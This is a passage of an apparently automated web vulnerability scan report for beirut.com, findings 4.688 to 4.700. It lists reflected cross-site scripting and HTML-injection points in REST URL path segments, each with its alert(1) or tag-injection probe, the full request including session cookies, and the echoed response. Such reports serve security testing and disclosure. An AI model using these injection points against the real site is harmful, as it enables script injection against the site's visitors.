Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreations/Public-Beachesf8bf2'-alert(1)-'11660c0128f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.688. http://www.beirut.com/Recreations/Theme-Parks/4635732484 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Theme-Parks/4635732484

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862b4"><a>9de7a23f23e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations862b4"><a>9de7a23f23e/Theme-Parks/4635732484 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:26:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations862b4"><a>9de7a23f23e">
...[SNIP]...

4.689. http://www.beirut.com/Recreations/Theme-Parks/4635732484 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Theme-Parks/4635732484

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66b11'-alert(1)-'5992b4f4705 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations66b11'-alert(1)-'5992b4f4705/Theme-Parks/4635732484 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:33:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations66b11'-alert(1)-'5992b4f4705/Theme-Parks';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.690. http://www.beirut.com/Recreations/Theme-Parks/4635732484 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Theme-Parks/4635732484

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b2e'-alert(1)-'e333c5a2b0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Theme-Parks44b2e'-alert(1)-'e333c5a2b0d/4635732484 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:37:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Recreations/Theme-Parks44b2e'-alert(1)-'e333c5a2b0d';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.691. http://www.beirut.com/Recreations/Yacht-Clubs/6501142 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Yacht-Clubs/6501142

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8b2"><a>be498242f4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreationscd8b2"><a>be498242f4c/Yacht-Clubs/6501142 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:25:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreationscd8b2"><a>be498242f4c">
...[SNIP]...

4.692. http://www.beirut.com/Recreations/Yacht-Clubs/6501142 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Yacht-Clubs/6501142

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a2ad'-alert(1)-'9dd3216d5f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations1a2ad'-alert(1)-'9dd3216d5f7/Yacht-Clubs/6501142 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:32:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Recreations1a2ad'-alert(1)-'9dd3216d5f7/Yacht-Clubs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.693. http://www.beirut.com/Recreations/Yacht-Clubs/6501142 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Yacht-Clubs/6501142

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 517a3'-alert(1)-'27fb9bcf2d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Yacht-Clubs517a3'-alert(1)-'27fb9bcf2d4/6501142 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:36:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Recreations/Yacht-Clubs517a3'-alert(1)-'27fb9bcf2d4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.694. http://www.beirut.com/Recreations/Yoga-Centers/03053122 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Yoga-Centers/03053122

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cfec'-alert(1)-'ec6aa3a3888 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations9cfec'-alert(1)-'ec6aa3a3888/Yoga-Centers/03053122 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:42:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreations9cfec'-alert(1)-'ec6aa3a3888/Yoga-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.695. http://www.beirut.com/Recreations/Yoga-Centers/03053122 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Yoga-Centers/03053122

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2df8d"><a>289183abcef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations2df8d"><a>289183abcef/Yoga-Centers/03053122 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:35:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations2df8d"><a>289183abcef">
...[SNIP]...

4.696. http://www.beirut.com/Recreations/Yoga-Centers/03053122 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Yoga-Centers/03053122

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d847'-alert(1)-'1fe4ea0fb8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Yoga-Centers5d847'-alert(1)-'1fe4ea0fb8c/03053122 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:48:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations/Yoga-Centers5d847'-alert(1)-'1fe4ea0fb8c';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.697. http://www.beirut.com/Restaurants/Bakeries/6807482759 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Bakeries/6807482759

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bf65'-alert(1)-'772924dfe28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants4bf65'-alert(1)-'772924dfe28/Bakeries/6807482759 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:57:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Restaurants4bf65'-alert(1)-'772924dfe28/Bakeries';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.698. http://www.beirut.com/Restaurants/Bakeries/6807482759 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Restaurants/Bakeries/6807482759

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d09ec"><a>5ea38197ead was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurantsd09ec"><a>5ea38197ead/Bakeries/6807482759 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:47:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurantsd09ec"><a>5ea38197ead">
...[SNIP]...

4.699. http://www.beirut.com/Restaurants/Bakeries/6807482759 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Bakeries/6807482759

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b076d'-alert(1)-'dd85d848931 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants/Bakeriesb076d'-alert(1)-'dd85d848931/6807482759 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:00:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurants/Bakeriesb076d'-alert(1)-'dd85d848931';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.700. http://www.beirut.com/Restaurants/Cafes/318727173 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Restaurants/Cafes/318727173

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f782"><a>3e05360c623 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants7f782"><a>3e05360c623/Cafes/318727173 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:38:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
